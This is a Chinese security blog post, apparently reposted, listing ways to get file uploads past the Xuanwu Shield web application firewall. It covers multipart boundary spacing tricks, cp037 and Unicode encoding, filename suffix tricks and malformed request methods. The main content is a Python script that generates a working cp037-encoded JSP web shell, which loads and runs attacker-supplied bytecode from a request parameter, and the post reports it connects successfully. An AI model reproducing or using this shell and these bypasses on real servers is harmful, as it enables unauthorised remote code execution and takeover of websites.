文件名绕过
boundary等号前后空格绕过
内容类型:多部分/表单数据;
boundary = —-WebKitFormBoundaryMJPuN1aHyzfAO2m3
![图片[1]-玄武盾的几种绕过姿势-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd084257-1024x186.png)
boundary等号前后ascii码09绕过
![图片[2]-玄武盾的几种绕过姿势-NGC660安全实验室](https://xzfile.aliyuncs.com/media/upload/picture/20220804173247-667f8d0c-13d8-1.png)
Cp037编码绕过
![图片[3]-玄武盾的几种绕过姿势-NGC660安全实验室](https://xzfile.aliyuncs.com/media/upload/picture/20220804173313-7603162c-13d8-1.png)
文件名后加/绕过
![图片[4]-玄武盾的几种绕过姿势-NGC660安全实验室](https://xzfile.aliyuncs.com/media/upload/picture/20220804173346-89b0ef5a-13d8-1.png)
畸形请求方法
![图片[5]-玄武盾的几种绕过姿势-NGC660安全实验室](https://xzfile.aliyuncs.com/media/upload/picture/20220804173414-9a799ddc-13d8-1.png)
文件内容绕过
统一码编码
![图片[6]-玄武盾的几种绕过姿势-NGC660安全实验室](https://xzfile.aliyuncs.com/media/upload/picture/20220804173449-af3d24e6-13d8-1.png)
cp037编码(脚本内置马支持后缀jsp/jspx,都可解析)
编码脚本
#python2 data = '''<?xml version="1.0" encoding="cp037"?> <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"> <jsp:declaration> class PERFORM extends ClassLoader { PERFORM(ClassLoader c) { super(c);} public Class bookkeeping(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[] branch(String str) throws Exception { Class base64; byte[] value = null; try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str }); } catch (Exception e) { try { base64=Class.forName("java.util.Base64"); Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str }); } catch (Exception ee) {} } return value; } </jsp:declaration> <jsp:scriptlet> String cls = request.getParameter("xxoo"); if (cls != null) { new PERFORM(this.getClass().getClassLoader()).bookkeeping(branch(cls)).newInstance().equals(new Object[]{request,response}); } </jsp:scriptlet> </jsp:root>''' fcp037 = open('cp037.jsp','wb')![](https://xzfile.aliyuncs.com/media/upload/picture/20220804173607-de2cfbb4-13d8-1.png) fcp037.write(data.encode('cp037'))
生成出来,burp选择paste from file
![图片[7]-玄武盾的几种绕过姿势-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd084137.png)
![图片[8]-玄武盾的几种绕过姿势-NGC660安全实验室](https://xzfile.aliyuncs.com/media/upload/picture/20220804173658-fc8dcca0-13d8-1.png)
可以正常连接
![图片[9]-玄武盾的几种绕过姿势-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd084204-1024x693.png)
文章转载于先知社区,原作者:安全之路漫漫
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容